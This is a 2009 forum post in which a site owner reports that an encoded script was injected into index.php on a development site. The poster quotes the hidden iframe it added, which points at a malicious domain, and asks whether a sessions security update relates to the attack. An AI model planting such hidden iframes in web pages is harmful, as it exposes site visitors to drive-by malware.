Guest tiptoncp, posted November 9, 2009

The particular site is still in development on a closed system, although the admin screen is still accessible for development login purposes. I just realized that the site had been hacked and there was an encoded script injected at the bottom of the index.php file in the main directory. The script is linked to a high-risk malicious domain. This is the iframe it injected. I did not decode the script, so I don't know if this is all it was doing or not.

<iframe width="635" height="586" style="display: none;" src="http://besenok.org/stds/go.php?sid=1&12694ea4d" name="f884005"/>

I saw the update that apparently fixes some vulnerabilities with sessions. When I implemented it, it screwed up all of my user/superuser admin dashboards. The access rights were still correct, as it would prompt saying you did not have access to this page if you were just an admin, but instead of hiding the links like before, it was showing everything. I have looked at the new code for the sessions, but I cannot find anything linked to the visibility of the inaccessible items. Any ideas?

Also, is the sessions fix directly related to the attack I mentioned above?

Thanks